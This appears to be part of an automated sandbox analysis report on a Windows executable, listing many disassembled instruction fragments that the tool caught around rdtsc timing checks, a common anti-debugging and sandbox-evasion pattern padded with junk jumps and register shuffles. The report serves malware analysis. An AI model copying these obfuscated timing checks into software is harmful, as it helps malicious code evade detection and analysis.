Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F91DD1 second address: F91DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F91DD7 second address: F91DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F91DE2 second address: F91DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F91DE8 second address: F91E17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA58h 0x00000007 jmp 00007FB16D3ACA4Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FB16D3ACA4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F91E17 second address: F91E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F91E22 second address: F91E28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F91E28 second address: F91E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F91E2E second address: F91E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB16D3ACA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F91E38 second address: F91E3E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F93D6A second address: F93D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB16D3ACA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC003D second address: 4EC0041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC0041 second address: 4EC0063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007FB16D3ACA52h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EB0017 second address: 4EB0043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16C743A50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB16C743A50h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EB0043 second address: 4EB005F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EF00F5 second address: 4EF00F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EF00F9 second address: 4EF010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EF010C second address: 4EF0131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB16C743A4Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB16C743A4Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EF0131 second address: 4EF0154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FB16D3ACA55h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EF0154 second address: 4EF018F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 mov di, 6F58h 0x0000000a pop ebx 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FB16C743A58h 0x00000016 or esi, 02C979B8h 0x0000001c jmp 00007FB16C743A4Bh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EF018F second address: 4EF01EF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB16D3ACA58h 0x00000008 sub cx, 3418h 0x0000000d jmp 00007FB16D3ACA4Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov di, si 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FB16D3ACA52h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FB16D3ACA57h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E800F6 second address: 4E80194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushfd 0x00000008 jmp 00007FB16C743A54h 0x0000000d or esi, 00F44328h 0x00000013 jmp 00007FB16C743A4Bh 0x00000018 popfd 0x00000019 mov ax, 301Fh 0x0000001d popad 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007FB16C743A52h 0x00000025 push eax 0x00000026 pushad 0x00000027 mov ebx, 2A9B6234h 0x0000002c mov di, 6DA0h 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 mov edx, 643050B8h 0x00000038 pushfd 0x00000039 jmp 00007FB16C743A51h 0x0000003e or ecx, 06EEB4A6h 0x00000044 jmp 00007FB16C743A51h 0x00000049 popfd 0x0000004a popad 0x0000004b mov ebp, esp 0x0000004d jmp 00007FB16C743A4Eh 0x00000052 push dword ptr [ebp+04h] 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80194 second address: 4E80198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80198 second address: 4E8019C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E8019C second address: 4E801A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E801A2 second address: 4E801B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16C743A4Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA0CD3 second address: 4EA0CF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA08C8 second address: 4EA08D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16C743A4Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA08D7 second address: 4EA08DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA08DB second address: 4EA091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FB16C743A55h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 call 00007FB16C743A59h 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA0799 second address: 4EA07EA instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ax, 61ABh 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB16D3ACA4Ch 0x00000014 xor si, 5B38h 0x00000019 jmp 00007FB16D3ACA4Bh 0x0000001e popfd 0x0000001f jmp 00007FB16D3ACA58h 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 movsx edx, cx 0x0000002a push eax 0x0000002b push edx 0x0000002c mov esi, 2A31EF4Fh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA07EA second address: 4EA07F8 instructions: 0x00000000 rdtsc 0x00000002 mov al, 31h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA07F8 second address: 4EA07FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA07FC second address: 4EA0802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA0802 second address: 4EA0808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EF0013 second address: 4EF0027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop esi 0x00000011 mov dl, A5h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EF0027 second address: 4EF0079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, edx 0x0000000f pushfd 0x00000010 jmp 00007FB16D3ACA57h 0x00000015 sbb eax, 0EC4FFCEh 0x0000001b jmp 00007FB16D3ACA59h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EF0079 second address: 4EF00B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, F4E2h 0x00000007 movsx ebx, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007FB16C743A52h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB16C743A57h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC038C second address: 4EC03D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007FB16D3ACA53h 0x0000000c xor al, 0000003Eh 0x0000000f jmp 00007FB16D3ACA59h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB16D3ACA4Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC03D7 second address: 4EC03DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC03DC second address: 4EC0418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB16D3ACA4Dh 0x0000000a adc al, 00000026h 0x0000000d jmp 00007FB16D3ACA51h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB16D3ACA4Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC0418 second address: 4EC043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16C743A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB16C743A4Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC043F second address: 4EC044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16D3ACA4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC044F second address: 4EC0453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA067D second address: 4EA0681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA0681 second address: 4EA0685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA0685 second address: 4EA068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA068B second address: 4EA0691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA0691 second address: 4EA06D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov edi, esi 0x0000000c pushfd 0x0000000d jmp 00007FB16D3ACA54h 0x00000012 and cl, FFFFFFC8h 0x00000015 jmp 00007FB16D3ACA4Bh 0x0000001a popfd 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB16D3ACA4Bh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA06D2 second address: 4EA06EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16C743A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA06EF second address: 4EA071D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007FB16D3ACA4Ch 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ch, bl 0x0000001b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA071D second address: 4EA0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 call 00007FB16C743A4Dh 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA0731 second address: 4EA0740 instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA0740 second address: 4EA0744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA0744 second address: 4EA074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EA074A second address: 4EA0758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16C743A4Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EB0F04 second address: 4EB0F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EB0F08 second address: 4EB0F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EB0F0E second address: 4EB0F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EB0F14 second address: 4EB0F18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EB0F18 second address: 4EB0F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB16D3ACA57h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EB0F3A second address: 4EB0F5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB16C743A58h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EB0F5E second address: 4EB0F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EB0F64 second address: 4EB0F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC011A second address: 4EC011E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC011E second address: 4EC0124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC0124 second address: 4EC01A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 push edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB16D3ACA56h 0x00000013 and ax, AF08h 0x00000018 jmp 00007FB16D3ACA4Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FB16D3ACA58h 0x00000024 add cl, 00000068h 0x00000027 jmp 00007FB16D3ACA4Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007FB16D3ACA56h 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC01A1 second address: 4EC01A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EC01A5 second address: 4EC01AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE0695 second address: 4EE069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 mov bl, 82h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE069E second address: 4EE06C5 instructions: 0x00000000 rdtsc 0x00000002 mov bh, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f mov cx, dx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB16D3ACA50h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE06C5 second address: 4EE06DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16C743A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, edx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE06DB second address: 4EE06FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ch, dl 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE06FE second address: 4EE0783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, si 0x00000007 popad 0x00000008 popad 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov dl, al 0x0000000d pushfd 0x0000000e jmp 00007FB16C743A53h 0x00000013 adc ax, 6B5Eh 0x00000018 jmp 00007FB16C743A59h 0x0000001d popfd 0x0000001e popad 0x0000001f mov eax, dword ptr [774365FCh] 0x00000024 jmp 00007FB16C743A4Eh 0x00000029 test eax, eax 0x0000002b jmp 00007FB16C743A50h 0x00000030 je 00007FB1DEC16C48h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB16C743A57h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE0783 second address: 4EE0789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE0789 second address: 4EE07D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB16C743A58h 0x00000013 sub al, 00000048h 0x00000016 jmp 00007FB16C743A4Bh 0x0000001b popfd 0x0000001c call 00007FB16C743A58h 0x00000021 pop esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE07D8 second address: 4EE07DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE07DD second address: 4EE0800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 450FCF43h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor eax, dword ptr [ebp+08h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB16C743A52h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE0800 second address: 4EE0806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE0806 second address: 4EE0820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB16C743A4Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE0820 second address: 4EE083D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
